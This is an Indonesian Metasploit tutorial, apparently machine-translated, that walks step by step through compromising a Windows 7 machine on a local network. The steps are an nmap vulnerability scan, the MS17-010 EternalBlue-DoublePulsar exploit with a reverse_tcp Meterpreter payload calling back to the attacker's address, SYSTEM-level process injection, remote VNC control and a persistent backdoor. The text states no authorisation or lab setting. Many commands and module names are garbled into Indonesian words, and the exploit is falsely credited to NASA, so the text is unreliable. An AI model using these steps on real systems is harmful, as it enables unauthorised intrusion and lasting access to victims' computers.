Karena kita telah membahas TOP 25 ALAT KALI LINUX TERBAIK dan menempatkan METASPLOIT pada urutan pertama, sekarang mari kita bahas dan pelajari tentang METASPLOIT. Kami menyarankan Anda membiasakan diri dengan Metasploit.
Metasploit awalnya dibuat oleh H.D Moore pada tahun 2003 hingga diakuisisi dan dikembangkan lebih lanjut oleh Rapid7 pada tanggal 21 Oktober 2009. Kerangka metasploit seluruhnya ditulis menggunakan Ruby dan merupakan paket standar yang diinstal pada sistem Kali Linux (dan juga hampir semuanya). Pengujian penetrasi OS, menurut saya). Ini adalah perangkat favorit para peretas atau penguji penetrasi untuk menyelidiki kerentanan keamanan, mengembangkan dan mengeksekusi eksploitasi terhadap target, dan pengembangan keamanan lainnya.
Metasploit hadir dalam beberapa edisi, umumnya terbagi dalam dua kategori: versi gratis dan versi berbayar. Versi gratis: Metasploit Framework Community Edition (antarmuka berbasis CLI) dan Armitage (antarmuka berbasis GUI). Versi berbayar: Metasploit Express, Metasploit Pro, dan Cobalt Strike (mirip dengan Armitage, disediakan oleh Strategic Cyber LLC).
Metasploit memungkinkan pengguna untuk membuat (atau mengembangkan) kode eksploitasi mereka sendiri, tetapi jangan khawatir jika Anda tidak tahu cara membuat kode, Metasploit memiliki begitu banyak modul dan terus diperbarui. Metasploit saat ini memiliki lebih dari 1.600 eksploitasi dan 500 payload. Cara sederhana untuk memahami eksploitasi dan payload pada dasarnya adalah bagaimana penyerang mengirimkan payload melalui lubang kerentanan di sistem target. Ketika seorang penyerang meluncurkan sebuah eksploitasi yang berisi muatan terhadap target yang rentan dan kemudian menyebarkan muatan tersebut (digunakan untuk menghubungkan kembali ke penyerang untuk mendapatkan akses jarak jauh terhadap sistem target), pada tahap ini eksploitasi tersebut selesai dan menjadi tidak relevan.
“Metasploit bukanlah alat peretasan instan, ini adalah kerangka kerja yang gila”
Artikel Metasploit ini membahas tentang melakukan uji penetrasi terhadap sistem target menggunakan alur berikut:
- Pemindaian kerentanan
- Penilaian kerentanan
- Memanfaatkan
- Mendapatkan akses jarak jauh – kuasai sistemnya
PERSIAPAN
Pastikan Kali Linux kita mempunyai versi update terbaru. Akan ada perbaikan dengan setiap pembaruan. Jalankan perintah berikut:
~:# pembaruan yang tepat
~:# peningkatan yang tepat -y:
~:# apt dist-upgrade -y:
Dengan mesin kita yang mutakhir, sekarang mari kita mulai menjalankan konsol metasploit. Di terminal, ketik:
Dan Anda juga memerlukan editor teks apa pun, Gedit atau Leafpad, untuk mengumpulkan beberapa informasi sebelum menyusun serangan. Pertama, identifikasi alamat IP antarmuka nirkabel Anda, IP router, dan netmask.
Berdasarkan informasi di atas, kami menentukan WLAN1 dan alamat IP router serta netmask. Jadi catatannya akan terlihat seperti ini:
IP Penyerang (LHOST): 192.168.1.56
IP Gerbang/Router: 192.168.1.1
Masker Jaringan: 255.255.255.0 (/24)
LANGKAH 1: Pemindaian Kerentanan
Di konsol Metasploit, kami awalnya mengumpulkan informasi seperti alamat IP target, Sistem Operasi, port terbuka, dan kerentanan. Metasploit memungkinkan kita menjalankan NMap langsung dari konsol. Berdasarkan informasi di atas, jalankan perintah ini untuk menyelesaikan tugas pengumpulan informasi kami.
msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O
Dari perintah di atas kami mendapatkan output di bawah ini.
Kami telah menerima target rentan yang menjalankan sistem operasi Windows dan kerentanannya berada pada layanan SMBv1. Jadi tambahkan catatannya.
IP Sasaran (RHOST): 192.168.1.57
Kerentanan. Kerentanan Eksekusi Kode Jarak Jauh di Server Microsoft SMBv1 (ms17-010)
LANGKAH 2: Penilaian Kerentanan
Sekarang kita tahu target dan kerentanannya. Mari kita periksa kerentanan dasbor metasploit
Sekarang kita tahu target dan kerentanannya. Mari kita pindai konsol metasploit untuk mencari kerentanan menggunakan modul pembantu smb_scanner. Jalankan perintah berikut:
msf: >: gunakan bantu/pemindai/seseorang:/seseorang_ms17_010
pembantu msf(seseorang_ms17_010) >: koleksi RHOST: (IP sasaran)
bantu msf(seseorang_ms17_010) >: untuk berlari
Metasploit yakin dengan kerentanannya dan menunjukkan Edisi OS Windows yang sebenarnya. Tambahkan catatan.
OS sasaran: Windows 7 Ultimate 7600
LANGKAH 3: OPERASI
Sayangnya, metasploit tidak memiliki modul eksploitasi untuk kerentanan ini. Tapi jangan khawatir, ada orang di luar sana yang membongkar dan menulis kode eksploitasi. Eksploitasi ini sudah tidak asing lagi karena diprakarsai oleh NASA, namanya EternalBlue-DoublePulsar. Anda dapat mengambilnya dari sini atau mengikuti video tutorial di bawah ini untuk menginstal kode eksploitasi dalam kerangka metasploit Anda.
Setelah anda mengikuti panduan diatas, (pastikan jalurnya sama dengan manual). Sekarang Anda siap mengoperasikan target. Jalankan perintah berikut:
menggunakan eksploitasi/jendela/seseorang:/abadibiru_doublepulsar:
koleksi jendela kargo/mengukur/membalikkan_tcp:
koleksi PROSESSINJEK spoolsv.exe
koleksi RHOST 192.168.1.57
koleksi LHOST 192.168.1.56
Beroperasi
Boom… Eksploitasi berhasil, kita mendapat sesi meterpreter. Seperti yang saya sebutkan sebelumnya, setelah operasi dimulai ia akan menyebarkan payload, di sini kami menggunakan windows/mengukur/reverse_tcp.
LANGKAH 4: DAPATKAN AKSES JARAK JAUH
Mari jelajahi lebih banyak perintah yang tersedia, ketik ‘?(tanpa tanda tanya) dan lihat daftar perintah yang tersedia. Dia standarperintah sistem adalah:
Untuk melihat informasi selengkapnya tentang sistem target, gunakan “info sistem:memerintah. Hasilnya harus serupa.
Karena kami menyuntikkan proses sistem (spoolsv.exe) sebelumnya, kami mendapat Hak Istimewa Sistem. Kami memiliki targetnya. Banyak hal yang bisa kita lakukan untuk mencapai tujuan tersebut. Misalnya, kita dapat menjalankan RDP atau cukup menginstal remote control VNC. Untuk memulai layanan VNC, masukkan perintah:
Hasilnya adalah desktop mesin target yang terlihat seperti ini:
Yang paling penting adalah membuat backdoor, sehingga ketika target terputus dari mesin kita, mesin target akan mencoba menyambung kembali ke kita. Backdooring digunakan untuk menjaga akses, seperti memancing, begitu mendapat ikan jangan langsung membuang ikannya kembali ke air kan? Anda ingin melakukan sesuatu dengan ikan tersebut, menyimpannya di lemari es untuk digunakan nanti, seperti dimasak atau dijual untuk mendapatkan uang.
Meterpreter memiliki fitur pintu belakang permanen ini. Jalankan perintah berikut dan lihat parameter dan argumen yang tersedia.
meteran >: jalankan ketekunan -h
Jika Anda tidak menyukai skrip usang ini, modul stabilitas terbaru ada di bawah post/windows/manage/persistence_exe. Anda sendiri bisa mengeksplorasinya lebih jauh.
Metasploit sangat besar, ini bukan hanya sebuah alat, ini adalah sebuah kerangka kerja, mengingat ia memiliki lebih dari 1600 eksploitasi dan sekitar 500 payload. Sebuah artikel hanya cocok untuk penggunaan umum atau ide gambaran besar. Tapi Anda telah belajar banyak dari artikel ini.
“Semakin Anda mengikuti alur serangan, semakin mudah Anda menghadapi tantangan.”